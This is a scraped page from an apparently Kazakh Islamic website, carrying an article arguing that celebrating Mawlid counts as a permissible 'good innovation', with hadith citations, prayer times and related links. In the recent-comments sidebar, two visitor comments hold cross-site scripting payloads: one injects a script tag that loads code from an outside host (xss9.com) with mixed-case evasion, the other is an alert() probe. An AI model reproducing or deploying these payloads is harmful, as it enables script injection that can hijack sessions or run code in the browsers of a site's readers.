Мәуліт бидғат па?
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Құптан 17:49
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

Мәуліт бидғат па?

| A | +

Пайғамбарымыз Мұхаммедтің (с.а.у.) туылған күнін – қасиетті мәулітті мереке ретінде атап өтудің дінімізде үкімі қандай? Кейде мәуліт мерекесінің «бидғат», яғни, дінімізге кейіннен қосылған қате, тіпті күнә амал екендігі айтылып жатады. Осының ара-жігін ажыратып берсеңіз.

 

Пайғамбарымыздың (с.а.у.) туылған күнін қасиетті мереке ретінде атап өту үрдісі ислам әлемінде һижри IV-V ғасырлардан басталады. Ислам ғұламалары бұл жайлы көптеген құнды еңбектер жазып, мәуліттің дініміздегі орнын анықтауға тырысқан. Қазіргі таңда бұл мерекені бір-екі мемлекеттен тыс барлық ислам әлемі ерекше атап өтеді. Мерекеде Алла Тағаланың кәламы – қасиетті Құран оқылып, пайғамбарымыз жайлы мадақ өлеңдер мен жырлар, салауаттар айтылып, сәлем жолданады. Пайғамбарымыздың өнегелі өмір жолы барынша қыр-сырымен насихатталып, үмбетінің Алла елшісіне (с.а.у.) деген сүйіспеншілік сезімдері одан әрі күшейтіле түседі. Мүмкіндікке қарай қасиетті мәуліт күнін себеп етіп жұртқа сусын, тамақ таратып, сыйлықтар беріп, басқа да игі шаралар атқаруға болады. Мәуліт мерекесін атап өтуді дұрыс деген ғалымдардың бәрі бірауыздан бұл мерекені атап өту барысында шариғатқа қайшы іс-әрекеттердің орын алмауын шарт қосуда.

 

Мәуліт мерекесіне байланысты дәлелдерді жазбас бұрын бұл мерекені арнайы атап өтудің пайғамбарымыздың хадисіндегі «...Кейіннен (дінде) шығарылған барлық жаңа нәрселер – бидғат, ал барлық бидғат – адасушылық» [1], – деп ескерткен адастырушы бидғатқа қатысы бар-жоқтығын анықтап алайық.

 

Иә, мәуліт мерекесін тойлау пайғамбарымыздың заманында болмағаны рас. Пайғамбарымыздың заманында болмаған істі ғибадат ретінде тұрақты жасау бидғатқа жатады. Бірақ бидғат түсінігі – ғұламалар арасында әр түрлі түсіндірмеге ие күрделі мәселе. Бір топ ғалымдар бойынша бидғат; «бидғат хасана», «бидғат саййа» яғни, жақсы және жаман бидғат болып екіге бөлінеді. Шариғатқа қайшы емес әрі мұсылмандарға пайдасы бар, құлды сауапқа жетелер барлық істер кейіннен қосылса да жақсы бидғатқа жатады. Бұл жайлы Имам Науауйи: «Пайғамбарымыздың заманында болмаған барлық істер бидғатқа жатады. Бірақ бидғаттың жақсы мен жаманы бар» деп бидғатқа түсінік берсе, Имам Шафиғи: «Кейіннен шығарылған істер екі түрлі болады. Біріншісі, Құранға, сүннетке, әсаарға яки ислам ғұламаларының ортақ ижмағына (үкімдегі ортақ көзқарас) қайшы келетін бидғаттар, бұл адастырушы бидғат. Ал екіншісі оларға ешкімнің қарсылығы жоқ жақсылық істер. Бұл дұрыс бидғат» [2] деп бидғатты екіге бөліп қараған.

 

Пайғамбарымыздан кейін қалыптасқан кейбір жақсы істер мен үрдістердің ғибадатта болса да жақсы бидғатқа жататындығына Омардың заманында болған мына бір оқиға дәлел бола алады: Абдур-Рахман ибну Абдил-Қаридан риуаят етілді. Ол былай деді: «Омармен бірге рамазанның бір түнінде мешітке бардым. Адамдар шашыраңқы. Әркім жеке-жеке намаз оқуда. Мұны көріп Омар: «Адамдардың бәрін бір қаридың артына жинағаным дұрыс секілді», – деді де, Убәй ибн Кәғбті имам етіп, жамағатты оған ұйытты. Сосын басқа бір түні мешітке Омармен бірге бардым. Адамдардың бәрі бір қариға ұйып тұр. Мұны көрген Омар: «Бұл қандай жақсы бидғат» деді [3]. Яғни, пайғамбарымыздың заманында мұсылмандар рамазанның әр түнінде жамағат болып тарауих намазын мешітте оқымайтын. Пайғамбарымыз (с.а.у.) бастапқы кезде бірнеше күн тарауих намазын мешітте оқыса да кейіннен мешітте оқымаған әрі тарауих үшін мешітке жамағатты жинамаған. Әбу Бәкірдің заманында да солай болған. Кейіннен Омар жамағаттың бәрін бір имамның арқасына тұрғызып, тарауих намазын күнде мешітте өткізу үрдісін қалыптастырған. Әрі «бұл қандай жақсы бидғат» деп бидғаттың барлығының жаман еместігін меңзеді.

 

Рифағату ибну Рафиғ әз-Зурақииден риуаят етілген мына бір оқиғаны да дәлел ретінде келтіруге болады. Рифағату ибну Рафиғ әз-Зурақии былай деді: «Бір күні пайғамбарымыздың артында намаз оқып тұр едік. Пайғамбарымыз рүкүғден басын көтерген кезде: «Самиғаллаһу лиман хамидаһ» (Алла Тағала мадақтың кім үшін екенін әлбетте естіді) деді. Артында тұрғандардың бірі: «Раббана уә лакал-хамду хамдан таййбан мүбәракан фиһ» (Раббымыз! Күллі тамаша әрі мүбәрак мақтаулардың бәрі саған тән) деп дұға оқыды. Намаздан шыққаннан кейін Пайғамбарымыз (с.а.у.): «Жаңағыны айтқан кім?», – деді. Әлгі кісі: «Мен», – деп жауап қайырды. Пайғамбарымыз: «Отыз неше [4] періште (айтылған бұл дұғаның) сауабын қайсымыз бірінші жазамыз деп жарысқанын көрдім», – деді [5]. Хадис саласының танымал хафиз ғалымы Ибн Хажар Асқалани бұл хадисті түсіндіру барысында: «осы хадис намазда сүннет дұғаларға қайшы емес, дұғаларды қосуға болатындығын дәлелдеді» [6],-деді. Пайғамбарымыз айтпаған бұл дұғаны әлгі сахабаның намазда айтуы әрі пайғамбарымыздың әлгі сахабаға қарсы шықпауы, тіпті, айтқан дұғасының сауабының зор екенінен хабар беруі – пайғамбарымыз істемеген әрбір нәрсенің дінімізде тыйылмағандығын аңғартады. Намаздың өзінде осындай сүннет дұғаларға қайшы емес дұғаларды айтуға тыйым салынбаса, намаздың тысындағы істерде қаншалықты кеңдік бар екенін аңғару қиын емес.

 

Пайғамбарымыздың (с.а.у.) басқа бір хадисінде: «Кімде-кім исламда жақсы жол бастаса (салса, үрдіс қалыптастырса, ойлап шығарса), ол адамға сол істің сауабы және өзінен кейін сол жолмен қияметке дейін амал еткен барлық адамдардың алатын сауабындай сауап жазылады. Ал кім де-кім исламда жаман жол бастаса (салса, үрдіс қалыптастырса, ойлап шығарса) ол адамға да сол жолдың күнәсі және өзінен кейін сол жолмен қияметке дейін амал еткен барша адамдардың күнәсындай күнә жазылады» [7], – деген. Демек, Сахих Муслимдегі бұл хадистен пайғамбарымыздан кейін қалыптасқан барлық істердің жаппай адастырушы бидғат емес екендігін, тіпті кейіннен қалыптасқан кейбір шариғатқа қайшы емес істердің өте сауапты іс екенін аңғаруға болады.

 

Ендеше, мәуліт мерекесін атап өту де иншаллаһ «жақсы бидғаттың» қатарына жатады. Хадис саласының мәшһүр ғалымы Хафиз Жәләлуддин әс-Сиюти өзінің «Мәуліт нәбиді атап өтудегі жақсы мақсат» деген кітабында мәуліттің үкімі жайлы сұралған сұраққа былай деп жауап берген: «...Мәуліт мерекесі жақсы бидғатқа жатады. Бұл амалды атқарушы сауапқа кенеледі. Себебі, мәулітте Пайғамбарымыздың қадір- қасиетін құрметтеу әрі оның дүниеге келуіне қуануды білдіру бар» [8], – деп жауап берген.

 

Енді бір топ ғалымдар бойынша бидғат; «жақсы», «жаман» делініп екіге бөлінбесе де, дінде негізі бар әрі шариғатқа қайшы емес кейіннен пайда болған барлық іс әрекеттер бидғатқа жатпайды.

 

Енді мәулітті атап өтудің дұрыс, тіпті, мұстахаб амал екендігіне байланысты дәлелдерді саралап көрейік:

Сахих Муслимде Әбу Қатададан мынандай хадис риуаят етілді. Ол былай деді: Пайғамбарымыздан (с.а.у.) дүйсенбі күнгі ораза жайлы сұралған еді. Пайғамбарымыз (с.а.у.): «Бұл күні мен дүниеге келдім әрі елші болып жіберілдім немесе [9] бұл күні маған Құран түсті»-деп жауап берді [10]. Хадисте пайғамбарымыздың дүниеге келген күнінің ерекшелігі мен қасиеттілігі, тіпті, бұл күнде Ұлы Жаратқанға шүкір ниетімен ораза ұстаудың сауаптылығы айтылған. Иә, Пайғамбарымыздың (с.а.у.) дүниеге аяқ басуы Ұлы Жаратушының ғаламға сыйлаған ең үлкен нығметі мен жақсылығы екені сөзсіз. Құранда: «Біз сені күллі ғалам үшін рақым етіп қана жібердік» [11] деп осы ақиқатты меңзеген. Сондықтан оның дүниеге аяқ басып, ғаламды нұрға бөлеуі – артынан ерген үмбеті үшін үлкен қуаныш. Ол дүниеге келмей тұрып, барша ғалам қараңғылыққа тұншығып жатқан-ды. Адамзат небір меңіреу пұттарды құдай танып, ес-түссіз құлшылық ұрды. Ақ қара саналып, асыл құнсызданды. Небір сорақы істер мен арсыз қылықтар игілікке бағаланып, иелері атақ- абыройға кенеліп жатты. Осы бір сұрапыл да қараңғы заматта Пайғамбарымыз Мұхаммед (с.а.у.) дүниеге қадам басты. Оның құтты қадамы осынау қараңғы дәуірге нұр боп шашылды.

 

Иә, біздер пайғамбарымыз (с.а.у.) арқылы Ұлы Жаратушыны қатесіз танып, оның тура жолын түсіндік. Ақ пен қараны ажыратып, жұмақ пен тозақты білдік. Ақыреттің сырларына үңіліп, небір тылсым дүниелерден хабардар болдық. Адамдық борышымыз бен асыл міндетімізді аңғарып, дүниенің мәні мен жаратылыстың мағынасын ұқтық. Ендеше, Пайғамбарымыздың (с.а.у.) дүниеге келуі – мұсылмандар үшін зор қуаныш, Ұлы Иеміздің құлдарына жасаған ұлы жақсылығы. Ал қуанышты бөлісудің, оны белгілі бір жүйемен көрсетудің, Алла Тағаланың жақсылығы мен нығметіне шүкір мақсатында жария етудің дінімізде негізі мен дәлелі бар. Құранда «Дұха» сүресінде: «Ал, Раббыңның саған берген нығметін (шүкір ету мақсатында) айт!»-десе, «Ибраһим» сүресінде: «...Алла Тағаланың күндерін олардың есіне сал» [12] делінеді. Ибн Аббас: «Алла Тағаланың күндерін» дегенді «Алла Тағаланың жақсылықтары берілген күндер» – деп те тәпсірлеген [13]. Олай болса, пайғамбарымыздың дүниеге келуін мереке ретінде атап өту – ең әуелі Алла Тағалаға шүкір етудің, көкіректегі қуанышты жария етіп бөлісудің көрінісі деуге әбден болады. Иә, оның дүниеге келіп, ғаламды нұрға бөлей бастаған күнге қуанбау, әсте, мүмкін емес. «Сахихул-Бухариде» және басқа да хадис кітаптарында Әбу Ләһабтың әр дүйсенбі күні тозақтағы азабының, аз да болса, жеңілдейтіндігіне байланысты хабар бар [14]. Себебі, Әбу Ләһаб Пайғамбарымыз дүниеге келгенін естіген кезде қуаныштан Суәйба атты күңін азат еткен. Ал енді өмірден кәпір болып өткен әрі Құранда Алла Тағаладан тікелей «екі қолы бірдей қурасын!» [15], – деп қарғыс алған Әбу Ләһабтың Пайғамбарымыздың (с.а.у.) дүниеге келгенін естіп, бір рет қуанғаны үшін тозақта, аз да болса, азабы жеңілдейтін болса, Мұхаммед пайғамбардың (с.а.у.) дүниеге келгені үшін өмір бойы көкірегін қуаныш билеп, Раббысына сол үшін шексіз шүкір еткен мұсылман баласының ақыретте Ұлы Жаратушысынан алар сауабын пайымдау қиын болмаса керек-ті.

 

Ибн Хажар Асқалани мәуліт мерекесінің дұрыстығына байланысты Бухари мен Муслимде және басқа да хадис кітаптарында кездесетін Ибн Аббастан риуаят етілген мына бір сахих хадисті дәлел ретінде келтіреді:

Пайғамбарымыз (с.а.у.) Меккеден Мәдинаға келген кезде еврейлердің Ашура күні ораза ұстап жатқанын көрді де: «Ораза ұстап жүрген бұл күндерің қандай күн?» , – деп сұрады. Олар: «Бұл – ұлы күн. Өйткені бұл күні Алла Тағала перғауын мен оның жұртын суға батырып, Мұса пайғамбар мен оның қауымын құтқарған еді. Мұса пайғамбар осы күні Алла Тағалаға шүкір ниетімен ораза ұстайтын. Міне, біз де ораза ұстаймыз», – деп жауап берді. Пайғамбарымыз (с.а.у.): «Мұса пайғамбарға біз сендерден де жақынбыз» – деп осы күні ораза ұстады әрі мұсылмандарға осы күні ораза ұстауды бұйырды» [16].

 

Ибн Хажар Асқалани бұл хадистен мәулітке байланысты мынандай дәлел шығарып отыр: «Бұл хадистен Алла Тағаланың арнайы бір күні берген жақсылығы яки бір қиыншылықтан құтқарғаны үшін құлдарының Оған алғыс білдіріп, шүкір етудің қажетті амал екенін түсінуге болады. Әрі бұл күн жыл сайын қайталанып отырады. Алла Тағалаға шүкір ету – сәжде жасау, ораза ұстау, садақа беріп, Құран оқу секілді түрлі ғибадаттар арқылы жүзеге асады. Ендеше, рақым пайғамбар – Мұхаммедтің дүниеге келуінен де артық Алла Тағаланың қандай жақсылығы, нендей үлкен нығметі бар?» [17], – деп пайғамбарымыздың (с.а.у.) дүниеге келуінің Алла Тағаланың құлдарына берген ұлы жақсылығы екенін және мәуліт мерекесін атап өтудің Ұлы Жаратушының осы жақсылығына деген құлдарының алғысы мен шүкірі, пайғамбарларына деген сүйіспеншілігі екенін түсіндірген. Иә, Ибн Хажар Асқалани секілді «Сахих Бухариға» «Фатхул-Бәри» атты кең түсіндірме жазған хадис саласының майталман шебері, «хафыз» ғалымының келтірген дәлелі ойлануға тұрарлық.

 

Әртүрлі зиянды яки пайдасыз мерекелер көптеп атап өтілетін бүгінгі қоғамда, сан-алуан жолдармен ділімізге, салт-санамызға жат ұғымдар барынша жарнамаланып жатқан қиын да қым-қиғаш мына заманда мәуліт мерекесіне «бидғат» деп қарсы шығудың орнына оны жастарымыздың, жалпы халқымыздың имандылығының артып, пайғамбарына деген сүйіспеншілігінің нығаюы үшін бар мүмкіндігінше пайдалана білуіміз керек.

 

Сөз соңы, Пайғамбарымыздың өнегелі өмір жолын жан-жақты ашып түсіндіретін, исламның асыл құндылықтарын насихаттайтын түрлі рухани кештер мен жиындарды ұйымдастыру – мерекені атап өтудің негізгі мақсаты мен асыл мұраты екенін ұмытпағанымыз жөн. Әйтпесе, пайғамбарымыздың туылған күні – тек ән салып, ішіп-жеумен ғана емес. Сондықтан мәуліт мерекесін атап өту барысында шариғатқа қайшы түрлі іс-әрекеттерден барынша аулақ болуымыз ләзім. Бұған қоса, жыл сайынғы мәулітке орай ұйымдастырылатын іс-шараларды түрлендіріп, мазмұнын сан алуан тақырыптармен гүлдендіріп отырсақ, халықтың ынта-ықыласы да артып, мерекенің берер нәтижесі де жемісті болары сөзсіз.

 

Хақ Тағала баршамызды өзіне сүйікті құл, хазірет Мұхамметке (с.а.у.) шынайы үмбет болуды нәсіп еткей! Әмин

 

[1] әл-Мустадрак алас-сахихайн, 1-том, 174-бет, Дарул-кутибил-илмия, Бәйрут, 1990 ж.

[2] Әбу Бәкір Ахмед ибн әл-Хусайн ибн Али ибн Муса Әбу Ахмет, Мағрифатус-сунан уәл-әәсаар лил- Бәйһақи, 2-том, 521-бет. Дәрул-кутубил-илмия, Бәйрут.

[3] Сахихул-Бухари, 2-том, 707-бет, Дәру Ибни Кәсир баспасы, Бәйрут, 1987 ж. Сунанул-Бәйһақил- кубра, 2-том, 493-бет, Мәктабату Дарил-Баз, Мекке, 1994 ж.

[4] Араб тілінде «бид’атун» сөзі үш пен тоғыз санының арасындағы мөлшерді білдіреді. Біз бұл жерде «неше» деп қазақ тіліндегі ең жақын баламасын ғана беріп отырмыз.

[5] Сахихул-Бухари, 1-том, 275-бет, Дәру Ибни Кәсир баспасы, Бәйрут, 1987 ж. Және қосымша мына хадис кітаптарына қараңыз: Муснад Ахмад, Насаай, Муатта, Бәйһақи, Әбу Дәәуід. Сахиху Ибни Хиббан.

[6] Ибн Хажар Асқалани, Фатхул-Бари шархул-Бухари, 2-том, 287-бет, Дарул-мағрифа баспасы, Бәйрут.

[7] Сахих Муслим, 2-том, 705-бет, «Дәру Ихиа’ит-турасил-араби баспасы», Бәйрут. Сунану Ибни Мәжа, 1-том, 74-бет, Дәрул-фикр баспасы, Бәйрут.

[8] Али Жум’а, әл-Баян лима иашғалул-әзһан, 166-бет, Каир, 2005 ж.

[9] Пайғамбарымыздың елші болып жіберілдім дегенін яки Құран түсе бастады деп айтқанын хадисті риуаят етуші кісі нақты есіне сақтай алмағандықтан осылай риуаят еткен.

[10] Сахих Муслим, 2-том, 819-бет, «Дәру Ихиа’ит-турасил-араби баспасы», Бәйрут. Сахих ибни Хиббан, 8-том, 403-бет, Муәссатур-Рисалә, Бәйрут, 1993 ж.

[11] «Әнбия» сүресі, 107-аят.

[12] «Ибраһим» сүресі, 5-аят.

[13] Алфайруз Абади, Тануирул-миқбас мин тафсири Ибн Аббас, 1-том, 211-бет. Дарлул-кутубил-илмия, Лубнан.

[14] Сахихул-Бухари, 5-том, 1961-бет, «Дәру Ибни Кәсир» баспасы, Бәйрут, 1987 ж.

[15] «Мәсад» сүресі, 1-аят.

[16] Сахихул-Бухари, 2-том, 704-бет, Дәру Ибни Кәсир баспасы, Бәйрут, 1987 ж. Сахих Муслим, 2-том, 796-бет, «Дәру Ихиа’ит-турасил-араби» баспасы, Бәйрут.

[17] Али Жум’а, әл-Баян ми’әту фәтуа ли радди әһәмми шубәһил-харижи уә лима шамилад-дахил, 167- бет, 2005 ж.

 

Қайрат ЖОЛДЫБАЙҰЛЫ

Предыдущий Следующий
САНА ДЕҢГЕЙЛЕРІ (діни-пәлсапалық эссе) Бас мүфти: Мәуліт мүбәрак болғай!

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Сұрақ-жауап Ізгі амалдың сауабын тірілерге бағыштауға бола ма?
Ізгі амалдардың сауабын тірілерге бағыштау ғұламалардың арасында тартысты мәселелердің бірі. Ханафи және Ханбали мәзһабы бойынша Құранның сауабын тірілерге бағыштауға рұқсат етіледі. ...
Сұрақ-жауап Ершат Оңғаров: Имам мен молда тұрғанда намазға кім шығады?
ІІІ Республикалық имамдар форумында қоғамдағы өте өзекті мәселелер талқыланды. Форум жайында Қазақстан Мұсылмандары діни басқармасы төрағасының орынбасары, наиб-мүфти Ершат Оңғаровпен сұхбаттастық....
Сұрақ-жауап Дәретханада сәлемдесуге бола ма?
Жалпы сәлем беру – сүннет, ал оған жауап қайтару – парыз. Алла Тағала қасиетті Құранда былай дейді: وَإِذَا حُيِّيتُمْ بِتَحِيَّةٍ فَحَيُّوا بِأَحْسَنَ مِنْهَا أَوْ رُدُّوهَا «Қашан сендерге сәлем берілсе, одан жақсырақ немесе соның өзін қайтарыңдар!»[1]....
Сұрақ-жауап Ешбір себепсіз ажырасу күнә ма?
Жауап: Исламда ажырасу «талақ» деп аталады. Талақтың тілдік мағынасы; жіберу, бос қою. Ал шариғаттағы мағынасы: «Ол – арнайы сөздермен некелік одақты бұзатын шариғи үкімді білдіреді»[1]. ...
Сұрақ-жауап Кімге уағыз айтуға рұқсат етілген?
Жауап: Біріншіден, уағыз-насихатты ислам оқу-орындарындағы «Дағуа» факультетін бітірген мамандар ғана айта алады. Олар иршад методологиясын жан-жақты меңгергендіктен, әртүрлі әлеуметтік топтың көңіл-күйіне қарай қалай уағыз айту керектігін жетік біледі....
Сұрақ-жауап «Халал» сертификатына ие 10 құс фабрикасы
Елімізде Халал индустриясы қарыштап дамып келеді. Халал саласы тұтынушылармен қатар кәсіпкерлер арасында да үлкен сұранысқа ие болғаны қуантарлық жағдай.
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Құптан 17:49

Бамдатқа дейін 03:29

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
13 сағат. бұрын

О милостыне

"/1

X X
13 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi